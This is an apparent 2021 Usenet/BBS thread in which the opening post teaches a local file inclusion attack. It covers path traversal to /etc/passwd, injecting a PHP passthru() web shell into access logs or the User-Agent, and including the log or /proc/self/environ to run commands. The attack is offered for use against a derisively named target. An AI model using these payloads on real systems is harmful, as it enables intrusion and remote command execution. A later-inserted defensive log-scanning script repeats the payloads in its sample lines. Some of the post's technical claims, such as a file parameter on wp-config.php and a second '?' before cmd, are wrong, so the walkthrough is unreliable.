• Anatomy of the hack...

    From gh0stanon@21:1/5 to All on Sun Mar 21 05:27:48 2021
    LFI Local File Inclusion hack

    So, let's say we wrote ourselves a little shell script to check for hosts vulnerable to LFI from something like the WordPress module wp-config.php
    or something similar.

    Once we have a vulnerable host, we can now do things like adding this to
    the end of the module path
    wp-config.php?file=../../../../../etc/passwd to see all the user
    accounts on this system. But better than that we can do something really
    nifty like this...

    telnet fuckwit.com 80
    get <? passthru($_GET['cmd']); ?> HTTP/1.1


    So that will obviously throw up an error but that is okay because all we
    really wanted was to get that string logged. :-)

    Confused? Well how about we include the log file? okay...

    fuckwit.com/index.php?file=../../../../../../../../var/log/access.log?cmd=whoami

    Interesting yet? Okay, maybe you can't seem to locate that log file and
    things are not working. Well there is something you can still try to get
    that string to work for you. It's called /proc/self/environ and it
    stores information about your user-agent. How about we get one of those
    little browser extensions that allow you to change your userhost and we
    change that to <?php passthru($_GET['cmd']); ?> :-D See what we did
    there?

    Now that string is in /proc/self/environ after you connected and you
    can easily /index.php?file=../../../../../../proc/self/environ

    Get the picture?



    --
    +++>> gh0stAnon <<+++
    cloakn3kcia4pnos.onion port 6697 ssl
    cloaknet@REMOVEriseup.net
    Twitter: @locogh0st

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
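
    Added example, not part of the original post: a defender-side check that scans web server access-log lines for the three traces the post above leaves behind (traversal in a query parameter, a PHP open tag in the request line, a PHP open tag in the User-Agent). It assumes the Apache/nginx "combined" log format; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache/nginx "combined" format; referer and user-agent are optional.
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" \d{3} \S+'
    r'(?: "(?P<referer>.*?)" "(?P<agent>.*?)")?$')
PHP_TAG = re.compile(r"<\?(php|=|\s)", re.I)   # PHP open tag, short tags included
TRAVERSAL = re.compile(r"\.\.[/\\]")
TARGETS = ("/etc/passwd", "/proc/self/environ", "/var/log/")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of LFI / log-poisoning indicators found in one log line."""
    m = LOG_RE.match(line.strip())
    if not m:
        return {"unparsed"}
    findings = set()
    request = m.group("request")
    if PHP_TAG.search(fully_decode(request)):
        findings.add("php_code_in_request_line")
    if PHP_TAG.search(fully_decode(m.group("agent") or "")):
        findings.add("php_code_in_user_agent")
    # The traversal string travels in the query string, not in the URL path.
    parts = request.split(" ")
    query = parts[1].partition("?")[2] if len(parts) >= 2 else ""
    for _name, value in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(value).replace("\\", "/")
        if TRAVERSAL.search(value):
            findings.add("traversal_in_parameter")
        if any(target in value for target in TARGETS):
            findings.add("sensitive_include_target")
    return findings

# Constructed sample lines (documentation IP range, not real traffic).
SAMPLE = r'''
203.0.113.5 - - [21/Mar/2021:05:27:48 +0000] "GET /index.php?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Mar/2021:05:30:11 +0000] "GET /index.php?file=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Mar/2021:05:31:02 +0000] "get <? passthru($_GET['cmd']); ?> HTTP/1.1" 400 226 "-" "-"
203.0.113.9 - - [21/Mar/2021:05:33:40 +0000] "GET /index.php?file=../../../../proc/self/environ HTTP/1.1" 200 901 "-" "<?php passthru($_GET['cmd']); ?>"
'''.strip().splitlines()
```

    A request that trips `sensitive_include_target` and comes back with status 200 is the one to triage first, since it suggests the include parameter reached the filesystem.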
  • From Big Bad Bob@21:1/5 to All on Mon Mar 22 02:38:46 2021
    On 2021-03-20 22:27, gh0stanon wrote:
    > LFI Local File Inclusion hack
    >
    > So, let's say we wrote ourselves a little shell script to check for hosts
    > vulnerable to LFI from something like the WordPress module wp-config.php
    > or something similar.
    >
    > Once we have a vulnerable host, we can now do things like adding this to
    > the end of the module path
    > wp-config.php?file=../../../../../etc/passwd to see all the user

    nearly every web server I know of won't allow you to access the file
    system by use of '../'


    --
    (aka 'Bombastic Bob' in case you wondered)

    'Feeling with my fingers, and thinking with my brain' - me

    'your story is so touching, but it sounds just like a lie'
    "Straighten up and fly right"

  • From Lurk@21:1/5 to Big Bad Bob on Mon Mar 22 09:48:09 2021
    On 22/03/2021 09:38, Big Bad Bob wrote:
    > On 2021-03-20 22:27, gh0stanon wrote:
    >> LFI Local File Inclusion hack
    >>
    >> So, let's say we wrote ourselves a little shell script to check for hosts
    >> vulnerable to LFI from something like the WordPress module wp-config.php
    >> or something similar.
    >>
    >> Once we have a vulnerable host, we can now do things like adding this to
    >> the end of the module path
    >> wp-config.php?file=../../../../../etc/passwd to see all the user
    >
    > nearly every web server I know of won't allow you to access the file
    > system by use of '../'


    damn... so that's why it didn't work :(

    --
    I psot (here) therefore I lurk (elsewhere).

  • From gh0stanon@21:1/5 to Big Bad Bob on Mon Mar 22 11:42:11 2021
    On 2021-03-22, Big Bad Bob <BigBadBob-at-mrp3-dot-com@testing.local> wrote:
    > On 2021-03-20 22:27, gh0stanon wrote:
    >> LFI Local File Inclusion hack
    >>
    >> So, let's say we wrote ourselves a little shell script to check for hosts
    >> vulnerable to LFI from something like the WordPress module wp-config.php
    >> or something similar.
    >>
    >> Once we have a vulnerable host, we can now do things like adding this to
    >> the end of the module path
    >> wp-config.php?file=../../../../../etc/passwd to see all the user
    >
    > nearly every web server I know of won't allow you to access the file
    > system by use of '../'



    with LFI enabled you can. LFI could not work without being able to

    Hope that helps

    --
    +++>> gh0stAnon <<+++
    cloakn3kcia4pnos.onion port 6697 ssl
    cloaknet@REMOVEriseup.net
    Twitter: @locogh0st

  • From Lurk@21:1/5 to All on Mon Mar 22 11:44:27 2021
    On 22/03/2021 11:42, gh0stanon wrote:
    > On 2021-03-22, Big Bad Bob <BigBadBob-at-mrp3-dot-com@testing.local> wrote:
    >> On 2021-03-20 22:27, gh0stanon wrote:
    >>> LFI Local File Inclusion hack
    >>>
    >>> So, let's say we wrote ourselves a little shell script to check for hosts
    >>> vulnerable to LFI from something like the WordPress module wp-config.php
    >>> or something similar.
    >>>
    >>> Once we have a vulnerable host, we can now do things like adding this to
    >>> the end of the module path
    >>> wp-config.php?file=../../../../../etc/passwd to see all the user
    >>
    >> nearly every web server I know of won't allow you to access the file
    >> system by use of '../'
    >
    > with LFI enabled you can. LFI could not work without being able to
    >
    > Hope that helps

    :)
    Helps me mate !

    --
    I psot (here) therefore I lurk (elsewhere).
